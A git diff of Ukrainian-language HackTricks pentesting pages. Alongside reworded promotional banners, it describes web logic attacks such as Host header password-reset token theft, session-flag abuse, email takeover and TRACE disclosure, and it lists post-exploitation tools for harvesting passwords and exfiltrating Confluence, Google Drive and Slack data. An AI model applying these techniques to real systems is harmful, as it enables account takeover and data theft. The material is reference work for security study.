-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **та** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -### Заголовок хоста +### Хедер хоста -Декілька разів бекенд довіряє **заголовку Host**, щоб виконати деякі дії. Наприклад, він може використовувати його значення як **домен для відправки скидання пароля**. Таким чином, коли ви отримуєте електронного листа з посиланням на скидання пароля, домен, який використовується, - це той, який ви вказали в заголовку Host. Потім ви можете запитати скидання пароля інших користувачів і змінити домен на той, яким ви керуєте, щоб вкрасти їх коди скидання пароля. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). +Декілька разів back-end довіряє **хедеру Host** для виконання деяких дій. Наприклад, він може використовувати його значення як **домен для відправки скидання пароля**. Таким чином, коли ви отримуєте електронного листа з посиланням на скидання пароля, домен, який використовується, - це той, який ви вказали в хедері Host. Тоді ви можете запитати скидання пароля інших користувачів і змінити домен на той, яким ви керуєте, щоб вкрасти їх коди скидання пароля. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). {% hint style="warning" %} -Зверніть увагу, що можливо вам навіть не потрібно чекати, поки користувач натисне на посилання для скидання пароля, щоб отримати токен, оскільки можливо навіть **спам-фільтри або інші проміжні пристрої/боти натиснуть на нього, щоб проаналізувати**. +Зверніть увагу, що можливо вам навіть не потрібно чекати, поки користувач натисне на посилання для скидання пароля, щоб отримати токен, оскільки можливо навіть **спам-фільтри або інші проміжні пристрої/боти натиснуть на нього для аналізу**. {% endhint %} ### Булеві значення сесії -Іноді, коли ви правильно пройдете певну перевірку, бекенд **просто додасть булеве значення "True" до атрибуту безпеки вашої сесії**. Потім інша точка доступу буде знати, чи ви успішно пройшли цю перевірку.\ -Однак, якщо ви **пройдете перевірку** і вашій сесії буде надано це значення "True" в атрибуті безпеки, ви можете спробувати **отримати доступ до інших ресурсів**, які **залежать від того самого атрибуту**, але до яких ви **не повинні мати дозволу** на доступ. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a). +Іноді, коли ви успішно пройшли деяку перевірку, back-end **просто додасть булеве значення "True" до атрибуту безпеки вашої сесії**. Потім інша точка доступу буде знати, чи ви успішно пройшли цю перевірку.\ +Однак, якщо ви **пройшли перевірку** і вашій сесії надано це значення "True" в атрибуті безпеки, ви можете спробувати **отримати доступ до інших ресурсів**, які **залежать від того самого атрибуту**, але до яких ви **не повинні мати дозволу** на доступ. [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a). ### Функціонал реєстрації @@ -33,14 +34,30 @@ ### Захоплення електронних листів -Зареєструйте електронну пошту, перш ніж підтвердити її, змініть електронну пошту, а потім, якщо новий лист підтвердження відправлено на першу зареєстровану електронну пошту, ви можете захопити будь-яку електронну пошту. Або якщо ви можете активувати другу електронну пошту, підтверджуючи першу, ви також можете захопити будь-який обліковий запис. +Зареєструйте електронну пошту, перед підтвердженням змініть її, а потім, якщо новий лист підтвердження відправлено на першу зареєстровану електронну пошту, ви можете захопити будь-яку електронну пошту. Або якщо ви можете активувати другу електронну пошту, підтверджуючи першу, ви також можете захопити будь-який обліковий запис. -### Доступ до внутрішньої служби підтримки компаній, які використовують atlassian +### Доступ до внутрішнього сервіс-деску компаній, які використовують atlassian {% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %} ### Метод TRACE -Розробники можуть забути вимкнути різні параметри налагодження в середовищі виробництва. Наприклад, HTTP-метод `TRACE` призначений для діагностичних цілей. Якщо він увімкнений, веб-сервер буде відповідати на запити, які використовують метод `TRACE`, повертаючи у відповіді точний запит, який було отримано. Ця поведінка часто безпечна, але іноді призводить до розкриття інформації, такої як назва внутрішніх заголовків аутентифікації, які можуть додаватися до запитів оберненими проксі-серверами.![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20) +Розробники можуть забути вимкнути різні параметри налагодження в середовищі виробництва. Наприклад, HTTP-метод `TRACE` призначений для діагностичних цілей. Якщо він увімкнений, веб-сервер буде відповідати на запити, які використовують метод `TRACE`, повертаючи у відповіді точний запит, який було отримано. Ця поведінка часто безпечна, але іноді призводить до розкриття інформації, такої як назва внутрішніх заголовків аутентифікації, які можуть додаватися до запитів оберненими проксі.![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20) ![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png) + + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. + +
+{% endhint %} diff --git a/todo/pentesting-dns.md b/todo/pentesting-dns.md index 0cadaeed5..1a7cfbf26 100644 --- a/todo/pentesting-dns.md +++ b/todo/pentesting-dns.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт з червоної команди AWS HackTricks)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} **Досліджуйте більше про атаки на DNS** @@ -18,19 +19,3 @@ **DNSSEC та DNSSEC3** **DNS в IPv6** - - - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт з червоної команди AWS HackTricks)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. - -
diff --git a/todo/post-exploitation.md b/todo/post-exploitation.md index 557cbf644..6175b5454 100644 --- a/todo/post-exploitation.md +++ b/todo/post-exploitation.md @@ -1,29 +1,27 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte) \ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)** ](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
- +{% endhint %} ## **Локальний лут** -* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Ці скрипти, крім пошуку PE векторів, шукають чутливу інформацію в файловій системі. -* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): Проект **LaZagne** - це відкрите програмне забезпечення, яке використовується для **отримання багатьох паролів**, збережених на локальному комп'ютері. Кожне програмне забезпечення зберігає свої паролі за допомогою різних технік (звичайний текст, API, власні алгоритми, бази даних і т. д.). Цей інструмент був розроблений з метою знаходження цих паролів для найбільш поширених програм. +* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Ці скрипти, крім пошуку PE векторів, шукатимуть чутливу інформацію всередині файлової системи. +* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): Проект **LaZagne** - це відкрите додаток, який використовується для **отримання багатьох паролів**, збережених на локальному комп'ютері. Кожне програмне забезпечення зберігає свої паролі за допомогою різних технік (звичайний текст, API, власні алгоритми, бази даних тощо). Цей інструмент був розроблений з метою знаходження цих паролів для найбільш поширеного програмного забезпечення. ## **Зовнішні сервіси** -* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Цей модуль підключиться до API Confluence за допомогою токена доступу, експортує в PDF та завантажить документи Confluence, до яких має доступ ціль. -* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Інструмент Red Team для виведення файлів з Google Drive цілі, до яких ви (атакуючий) маєте доступ, через API Google Drive. Це включає всі спільні файли, всі файли зі спільних дисків та всі файли з доменних дисків, до яких має доступ ціль. -* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Інструмент Red Team для виведення довідника Google People організації цілі, до якого ви маєте доступ, через API People Google. +* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Цей модуль підключиться до API Confluence за допомогою токена доступу, експортує у PDF та завантажить документи Confluence, до яких має доступ ціль. +* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Інструмент Red Team для виведення файлів з Google Drive цілі, до яких у вас (зловмиснику) є доступ, за допомогою API Google Drive. Це включає всі спільні файли, всі файли зі спільних дисків та всі файли з доменних дисків, до яких має доступ ціль. +* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Інструмент Red Team для виведення довідника Google People організації цілі, до якого у вас є доступ, за допомогою API People Google. * [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** Це інструмент, розроблений на Python, який використовує вбудовані API Slack для вилучення 'цікавої' інформації з робочого простору Slack за наявності токена доступу. -* [**Slackhound**](https://github.com/BojackThePillager): Slackhound - це інструмент командного рядка для червоних і синіх команд для швидкого проведення розвідки робочого простору/організації Slack. Slackhound робить збір інформації про користувачів організації, файли, повідомлення тощо швидко доступними для пошуку, а великі об'єкти записуються в CSV для офлайн перегляду. - - +* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound - це інструмент командного рядка для червоних та синіх команд для швидкого проведення розвідки робочого простору/організації Slack. Slackhound робить збір інформації про користувачів організації, файли, повідомлення тощо швидко доступними для пошуку, а великі об'єкти записуються в CSV для офлайн перегляду.